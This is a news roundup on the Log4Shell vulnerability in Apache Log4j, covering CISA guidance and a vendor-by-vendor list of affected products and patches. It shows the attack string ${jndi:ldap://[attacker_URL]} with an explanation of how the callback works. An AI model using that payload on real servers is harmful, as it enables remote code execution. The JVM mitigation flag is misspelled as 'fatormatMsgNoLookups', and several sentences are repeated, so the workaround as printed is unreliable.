News has broken that there is a critical vulnerability in the Apache Log4j logging library.
Log4j is an open source Java logging framework that is part of Apache Logging Services and is used at the enterprise level in a variety of applications from vendors around the world.
Apache has released Log4j 2.15.0 to address a vulnerability of the highest severity (CVE-2021-44228, also known as Log4Shell or LogJam).
According to data from Cloudflare and Cisco Talos, attacks have been detected since the beginning of this month, although large-scale exploitation only began after the exploit code became freely available.
The Log4Shell vulnerability was reported by Alibaba’s cloud security team on November 24, but it is unclear why some attackers were able to exploit it so quickly.
Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said the agency is working with private and public sector partners to address the issue.
We are acting urgently to promote defensive measures for this vulnerability and to detect related threat activity.
We are adding this vulnerability to our catalog of known vulnerabilities that are being exploited and are telling federal civilian agencies and non-federal partners to urgently patch or fix this vulnerability
Log4Shell can remotely execute code without being authenticated via Java Naming and Directory Interface (JNDI) injection. An attacker can exploit this vulnerability by changing the user agent of the browser to a string of the form ${jndi:ldap://[attacker_URL]}.
This string will be logged on the victim’s web server, and when the Log4j library parses it, it will force a callback or request to the attacker’s URL. The attacker can use this string to pass encoded commands or Java classes to the vulnerable machine.
Given the severity of this vulnerability and the ease with which it can be exploited, CISA has issued guidance to help organizations set up defenses against Log4Shell attacks.
CISA recommends “applying any available patches immediately” and requires that this process be prioritized.
First, priority should be given to applying patches to mission-critical systems, systems connected to the Internet, and servers connected to the network. After that, we recommend prioritizing patches for other affected information technology and operational technology assets
If you are unable to patch your system, we recommend the following items.
Add the string -Dlog4j2.fatormatMsgNoLookups=True to the Java Virtual Machine's application startup command and set log4j2. Set fatormatMsgNoLookups to true.
This workaround is only available in version 2.10 and later.
Right after the details of Log4Shell were revealed, vendors started to investigate whether their products would be affected and listed information about the results.
Amazon
Amazon has updated their product to use a non-vulnerable version of the Log4j component and announced that they are working on updates for other products or will release new versions in the near future.
Details of the affected services have been published, including OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass, and API Gateway.
Atlassian
According to the company, they do not believe there are any on-premise products that could be exploited with the default settings.
If you change the default log settings (log4j.properties) to enable the JMS appender feature, some products such as Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible, and some other products may pose a remote code execution risk.
Broadcom
Broadcom has published mitigations and knowledge base articles for several Symantec products that are affected by the Log4j vulnerability. These products include CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub, and Symantec Endpoint Protection Manager (SEPM ).
Cisco
Cisco has released a list of products affected by Log4Shell and a schedule for patching starting December 14.
The products affected are from various categories, such as
- Network and Content Security Devices (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
- Collaboration and Social Media (Cisco Webex Meetings Server)
- Network Management and Provisioning (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
- Enterprise Routing and Switching (Cisco Network Assurance Engine, Cisco SD-WAN vManage)
Citrix
Citrix does not list any products as being vulnerable to Log4Shell, although research is ongoing and the situation may change for some products.
ConnectWise
ConnectWise said its cloud service, Perch, was found to rely on a third-party component with a “potential vulnerability”.
The vulnerable third party was found to be FortiGuard’s FortiSIEM used in ConnectWise’s StratoZen solution, causing the company to temporarily restrict access to the hosted StratoZen server. The company has temporarily restricted access to the hosted StratoZen servers. Access to most services has now been restored.
cPanel
According to the forum thread, only instances where the cPanel Solr plugin is present are affected and can be exploited, but that only affects locally.
We are pleased to announce that an update with mitigations for Log4Shell is available in the cpanel-dovecot-solr package.
Debian
Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) and 12 (Bookworm) have been added with patched Log4j packages as security updates.
Docker
It has been discovered that 12 official Docker images use a vulnerable version of the Log4j library. This list includes couchbase, elasticsearch, logstash, sonarqube, and solr.
Docker says that they are “in the process of updating Log4j 2 in these images to the latest available version” and that the images may not be vulnerable for other reasons. https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/
FortiGuard
According to the company, about 10 of its products are vulnerable, and fixes or mitigations have already been introduced for four of them.
FortiGuard announced that it is updating its advisory to include the effective dates of fixes for other products, including FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy, and ShieldX.
F-Secure
Both Windows and Linux versions of some F-Secure products are affected by Log4Shell.
Policy Manager (Policy Manager Server component only), Policy Manager Proxy, Endpoint Proxy, and Elements Connector.
The company has created a security patch for administrators to fix this issue, and provides step-by-step instructions for deploying it.
Ghidra
The NSA’s open source reverse engineering tool has been updated to version 10.1, and the Log4j dependency has been upgraded to a vulnerability-free iteration.
IBM
According to IBM’s Log4Shell advisory, only WebSphere Application Server versions 9.0 and 8.5 are affected by the vulnerability, via the Admin Console and UDDI Registry Application components, and that the issue has been addressed.
Juniper Networks
Networking company Juniper Networks has revealed that four of its products will be affected.
This applies to Paragon Active Assurance, Paragon Insights, Paragon Pathfinder, and Paragon Planner.
Six additional products are potentially affected at this time, including the JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director
Six additional products are currently affected, including the JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics, and Security Director (Security Director Insights is not affected).
McAfee
The company has not yet completed its evaluation and says it is investigating 12 products.
MongoDB
Only MongoDB Atlas Search needs to be patched against Log4Shell, the company commented.
The developer states that no evidence of exploitation or indicators of danger were found before the patch was deployed.
Okta
Okta has released an update to the Okta RADIUS Server Agent and Okta On-Prem MFA Agent to mitigate the risk posed by the Log4Shell vulnerability, and strongly recommends that users apply the fix from the Admin Console.
We have also released an update to the Okta RADIUS Server Agent and Okta On-Prem MFA Agent and strongly encourage customers to apply the fixes from the admin console.
Oracle
Oracle has announced that “several” of its products are using vulnerable versions of the Log4j component.
The company has issued a security alert that introduces the My Oracle Support Document and strongly recommends that you apply the provided updates “as soon as possible.
OWASP Foundation
It has been discovered that versions of the Zed Attack Proxy (ZAP) web app scanner below 2.11.1 use a vulnerable Log4j component.
RedHat
Red Hat has announced that components of several Red Hat products are affected by Log4Shell and strongly recommends that you apply updates as soon as they become available.
The products listed are Red Hat OpenShift 4 and 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8, and Red Hat Fuse 7.
SolarWinds
Server & Application Monitor (SAM) and Database Performance Analyzer (DPA) use a vulnerable version of Apache Log4j.
Both products, however, use a version of the Java Development Kit (JDK) that is either unaffected by the Logj4 vulnerability or has a reduced risk.
SonicWall
Our ongoing investigation has revealed that SonicWall’s Email Security version 10.x is affected by the Log4Shell vulnerability.
A fix is currently under development and will be released “soon”.
According to the company’s advisory, five other SonicWall products are still under investigation, and the remaining products are unaffected by this issue.
Splunk
Core Splunk Enterprise is unaffected unless you use Data Fabric Search.
The company publishes versions of its products affected by Log4Shell, both in the cloud and on-premise.
At this time we have released fixes for some products and are working on rolling updates for at least 7 products.
VMware
VMware has fixed several products vulnerable to Log4Shell attacks and is in the process of rolling out patches for 27 more products.
The last updated advisory lists about 40 products as being affected by this critical vulnerability. Many of them are labeled as “Patch Pending” and may have mitigations available.
Ubiquiti
The UniFi Network Application, which uses the Log4j library, has been updated to address a critical Log4Shell vulnerability.
Ubuntu
According to the security advisory, the Log4j package has been patched upstream, and updates have been applied to Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo), 21.10 (Impish Indri) have been updated.
Zoho
We discovered that the ADAudit Plus component, which audits Active Directory changes and is part of the ManageEngine monitoring solution, is vulnerable to a Log4Shell attack.
Zoho has outlined steps to mitigate this issue.
Zscaler
Zscaler has patched several products that were using a vulnerable version of the Log4j library.
As a result of patching all of the Private Access (ZPA) Services, Zscaler Mobile Admin and Support Mobile Admin components, the company concludes that this issue has been fixed across all products.
Summary
Some companies may not take measures to address the Log4Shell vulnerability because they believe that running a specific Java version will reduce the possibility of exploitation. In such cases, the Log4j library needs to be updated to the latest version.
Márcio Almeida, senior security engineer at Canva, a graphic design platform, warns that with the addition of support for LDAP serialized payloads in the JNDI Exploit Kit, Log4Shell attacks can now work on any version of Java. With the addition of support for LDAP serialized payloads in the JNDI exploit kit, Log4Shell attacks can now work on any version of Java.
Comments